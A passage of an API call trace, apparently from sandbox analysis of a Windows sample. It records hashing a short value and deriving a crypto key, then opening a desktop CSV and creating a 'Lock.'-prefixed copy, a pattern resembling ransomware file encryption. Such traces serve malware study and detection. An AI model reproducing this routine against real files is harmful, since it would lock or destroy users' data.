wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.813] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0111.813] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.813] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.813] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0111.813] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.813] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0111.813] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.813] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.813] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0111.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9f10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0111.814] CryptCreateHash (in: hProv=0x9bf330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0111.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0111.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ae8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0111.814] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0111.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0111.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0111.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.814] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0111.814] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.814] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0111.814] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.814] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0111.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9e20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0111.814] CryptHashData (hHash=0x9a4800, pbData=0x2a717c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0111.815] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.815] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.815] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.815] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0111.815] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.815] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0111.815] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.815] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.815] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0111.815] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.815] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0111.815] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.815] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.815] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0111.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9d60, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0111.815] CryptDeriveKey (in: hProv=0x9bf330, Algid=0x6601, hBaseData=0x9a4800, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4880) returned 1 [0111.815] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.815] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.815] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.815] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.815] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.816] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.816] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0111.816] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0111.816] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0111.816] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0111.816] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0111.816] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0111.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0111.816] CryptDestroyHash (hHash=0x9a4800) returned 1 [0111.816] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.816] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.816] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.816] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.816] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.817] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/ZvWDNly8ss.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\zvwdnly8ss.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0111.817] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.817] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0111.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7180 [0111.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0111.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0111.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0111.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0111.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0111.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0111.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0111.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0111.817] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0111.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0111.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0111.817] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0111.817] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0111.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0111.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0111.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0111.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0111.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0111.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0111.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0111.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0111.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0111.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0111.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0111.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0111.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0111.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0111.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0111.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0111.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0111.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0111.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75d80 [0111.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0111.818] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0111.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75d80 | out: hHeap=0x2af0000) returned 1 [0111.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0111.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0111.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0111.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0111.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0111.819] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.ZvWDNly8ss.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.zvwdnly8ss.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0111.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7220 [0111.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0111.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0111.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0111.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0111.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0111.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0111.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0111.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0111.819] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0111.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0111.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0111.819] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0111.819] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0111.819] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0111.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0111.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0111.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0111.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0111.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0111.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0111.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0111.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0111.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0111.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0111.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0111.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0111.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0111.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0111.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0111.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0111.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0111.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0111.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0111.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0111.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0111.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0111.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0111.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0111.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0111.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0111.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0111.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0111.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0111.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0111.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cb5020 [0111.823] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0111.823] ReadFile (in: hFile=0x4ec, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0xcf42, lpOverlapped=0x0) returned 1 [0111.825] ReadFile (in: hFile=0x4ec, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0111.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0111.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0111.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0111.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0111.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcf42) returned 0x2a7a130 [0111.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cb5020 | out: hHeap=0x2af0000) returned 1 [0111.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0111.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0111.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0111.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0111.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0111.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0111.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0111.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0111.829] 